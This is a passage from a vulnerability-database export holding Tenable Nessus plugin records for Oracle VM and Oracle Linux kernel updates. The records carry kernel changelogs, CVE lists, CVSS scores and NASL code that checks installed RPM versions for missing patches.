be2net: don't flip hw_features when VXLANs are\n added/deleted (Davide Caratti) [Orabug: 29475071]\n\n - be2net: Fix memory leak in be_cmd_get_profile_config\n (Petr Oros) [Orabug: 29475071]\n\n - be2net: Use Kconfig flag to support for\n enabling/disabling adapters (Petr Oros) [Orabug:\n 29475071]\n\n - be2net: Mark expected switch fall-through (Gustavo A. 
R.\n Silva) [Orabug: 29475071]\n\n - be2net: fix spelling mistake 'seqence' -> 'sequence'\n (Colin Ian King) [Orabug: 29475071]\n\n - be2net: Update the driver version to 12.0.0.0 (Suresh\n Reddy) [Orabug: 29475071]\n\n - be2net: gather debug info and reset adapter (only for\n Lancer) on a tx-timeout (Suresh Reddy) [Orabug:\n 29475071]\n\n - be2net: move rss_flags field in rss_info to ensure\n proper alignment (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: re-order fields in be_error_recovert to avoid\n hole (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: remove unused tx_jiffies field from be_tx_stats\n (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: move txcp field in be_tx_obj to eliminate holes\n in the struct (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: reorder fields in be_eq_obj structure (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old custom busy-poll fields (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old AIC info (Ivan Vecera)\n [Orabug: 29475071]\n\n - be2net: Fix error detection logic for BE3 (Suresh Reddy)\n [Orabug: 29475071]\n\n - scsi: sd: Do not override max_sectors_kb sysfs setting\n (Martin K. 
Petersen) [Orabug: 29596510]\n\n - USB: serial: io_ti: fix div-by-zero in set_termios\n (Johan Hovold) [Orabug: 29487834] (CVE-2017-18360)\n\n - bnxt_en: Drop oversize TX packets to prevent errors.\n (Michael Chan) [Orabug: 29516462]\n\n - x86/speculation: Read per-cpu value of\n x86_spec_ctrl_priv in x86_virt_spec_ctrl (Alejandro\n Jimenez) [Orabug: 29526401]\n\n - x86/speculation: Keep enhanced IBRS on when prctl is\n used for SSBD control (Alejandro Jimenez) [Orabug:\n 29526401]\n\n - USB: hso: Fix OOB memory access in\n hso_probe/hso_get_config_data (Hui Peng) [Orabug:\n 29605982] (CVE-2018-19985) (CVE-2018-19985)\n\n - swiotlb: save io_tlb_used to local variable before\n leaving critical section (Dongli Zhang) [Orabug:\n 29637525]\n\n - swiotlb: dump used and total slots when swiotlb buffer\n is full (Dongli Zhang) [Orabug: 29637525]\n\n - x86/bugs, kvm: don't miss SSBD when IBRS is in use.\n (Quentin Casasnovas) [Orabug: 29642113]\n\n - cifs: Fix use after free of a mid_q_entry (Shuning\n Zhang) [Orabug: 29654888]\n\n - binfmt_elf: switch to new creds when switching to new mm\n (Linus Torvalds) [Orabug: 29677233] (CVE-2019-11190)\n\n - x86/microcode: Don't return error if microcode update is\n not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 19, "cvss3": {"score": 4.7, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-31T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2019-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/125615", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory 
OVMSA-2019-0022.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125615);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/13\");\n\n script_cve_id(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - scsi: libfc: sanitize E_D_TOV and R_A_TOV setting\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: use configured rport E_D_TOV (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: additional debugging messages (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: don't advance state machine for incoming\n FLOGI (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not login if the port is already started\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not drop down to FLOGI for\n fc_rport_login (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not take rdata->rp_mutex when processing\n a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug:\n 25933179]\n\n - scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke)\n [Orabug: 25933179]\n\n - xve: arm ud tx cq to generate completion interrupts\n (Ajaykumar Hotchandani) [Orabug: 28267050]\n\n - net: sched: run ingress qdisc without locks (Alexei\n Starovoitov) [Orabug: 29395374]\n\n - bnxt_en: Fix typo in firmware message timeout logic.\n (Michael Chan) [Orabug: 29412112]\n\n - bnxt_en: Wait longer for the firmware message response\n to complete. (Michael Chan) [Orabug: 29412112]\n\n - mm,vmscan: Make unregister_shrinker no-op if\n register_shrinker failed. 
(Tetsuo Handa) [Orabug:\n 29456281]\n\n - X.509: Handle midnight alternative notation in\n GeneralizedTime (David Howells) [Orabug: 29460344]\n (CVE-2015-5327)\n\n - X.509: Support leap seconds (David Howells) [Orabug:\n 29460344] (CVE-2015-5327)\n\n - X.509: Fix the time validation [ver #2] (David Howells)\n [Orabug: 29460344] (CVE-2015-5327) (CVE-2015-5327)\n\n - be2net: enable new Kconfig items in kernel configs\n (Brian Maly) [Orabug: 29475071]\n\n - benet: remove broken and unused macro (Lubomir Rintel)\n [Orabug: 29475071]\n\n - be2net: don't flip hw_features when VXLANs are\n added/deleted (Davide Caratti) [Orabug: 29475071]\n\n - be2net: Fix memory leak in be_cmd_get_profile_config\n (Petr Oros) [Orabug: 29475071]\n\n - be2net: Use Kconfig flag to support for\n enabling/disabling adapters (Petr Oros) [Orabug:\n 29475071]\n\n - be2net: Mark expected switch fall-through (Gustavo A. R.\n Silva) [Orabug: 29475071]\n\n - be2net: fix spelling mistake 'seqence' -> 'sequence'\n (Colin Ian King) [Orabug: 29475071]\n\n - be2net: Update the driver version to 12.0.0.0 (Suresh\n Reddy) [Orabug: 29475071]\n\n - be2net: gather debug info and reset adapter (only for\n Lancer) on a tx-timeout (Suresh Reddy) [Orabug:\n 29475071]\n\n - be2net: move rss_flags field in rss_info to ensure\n proper alignment (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: re-order fields in be_error_recovert to avoid\n hole (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: remove unused tx_jiffies field from be_tx_stats\n (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: move txcp field in be_tx_obj to eliminate holes\n in the struct (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: reorder fields in be_eq_obj structure (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old custom busy-poll fields (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old AIC info (Ivan Vecera)\n [Orabug: 29475071]\n\n - be2net: Fix error detection logic for BE3 (Suresh Reddy)\n [Orabug: 29475071]\n\n - 
scsi: sd: Do not override max_sectors_kb sysfs setting\n (Martin K. Petersen) [Orabug: 29596510]\n\n - USB: serial: io_ti: fix div-by-zero in set_termios\n (Johan Hovold) [Orabug: 29487834] (CVE-2017-18360)\n\n - bnxt_en: Drop oversize TX packets to prevent errors.\n (Michael Chan) [Orabug: 29516462]\n\n - x86/speculation: Read per-cpu value of\n x86_spec_ctrl_priv in x86_virt_spec_ctrl (Alejandro\n Jimenez) [Orabug: 29526401]\n\n - x86/speculation: Keep enhanced IBRS on when prctl is\n used for SSBD control (Alejandro Jimenez) [Orabug:\n 29526401]\n\n - USB: hso: Fix OOB memory access in\n hso_probe/hso_get_config_data (Hui Peng) [Orabug:\n 29605982] (CVE-2018-19985) (CVE-2018-19985)\n\n - swiotlb: save io_tlb_used to local variable before\n leaving critical section (Dongli Zhang) [Orabug:\n 29637525]\n\n - swiotlb: dump used and total slots when swiotlb buffer\n is full (Dongli Zhang) [Orabug: 29637525]\n\n - x86/bugs, kvm: don't miss SSBD when IBRS is in use.\n (Quentin Casasnovas) [Orabug: 29642113]\n\n - cifs: Fix use after free of a mid_q_entry (Shuning\n Zhang) [Orabug: 29654888]\n\n - binfmt_elf: switch to new creds when switching to new mm\n (Linus Torvalds) [Orabug: 29677233] (CVE-2019-11190)\n\n - x86/microcode: Don't return error if microcode update is\n not needed (Boris Ostrovsky) [Orabug: 29759756]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2019-May/000941.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11190\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-02-01T05:11:34", "description": "Description of changes:\n\n[4.1.12-124.27.1.el6uek]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. 
(Chad Dupuis) [Orabug: 25933179]\n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179]\n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050]\n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374]\n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112]\n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112]\n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. (Tetsuo Handa) [Orabug: 29456281]\n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071]\n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071]\n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071]\n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071]\n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071]\n- be2net: Mark expected switch fall-through (Gustavo A. R. 
Silva) [Orabug: 29475071]\n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071]\n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071]\n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071]\n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071]\n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071]\n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071]\n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071]\n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071]\n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. Petersen) [Orabug: 29596510]\n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462]\n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401]\n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401]\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525]\n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525]\n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. 
(Quentin Casasnovas) [Orabug: 29642113]\n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888]\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 19, "cvss3": {"score": 4.7, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-17T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4642)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2019-4642.NASL", "href": "https://www.tenable.com/plugins/nessus/125235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-4642.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125235);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/15\");\n\n script_cve_id(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4642)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-124.27.1.el6uek]\n- scsi: libfc: 
sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179]\n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179]\n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050]\n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374]\n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112]\n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112]\n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. 
(Tetsuo Handa) [Orabug: 29456281]\n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071]\n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071]\n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071]\n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071]\n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071]\n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071]\n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071]\n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071]\n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071]\n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071]\n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071]\n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071]\n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071]\n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071]\n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. 
Petersen) [Orabug: 29596510]\n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462]\n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401]\n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401]\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525]\n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525]\n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113]\n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888]\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-May/008739.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-May/008740.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11190\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2019-4642\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", 
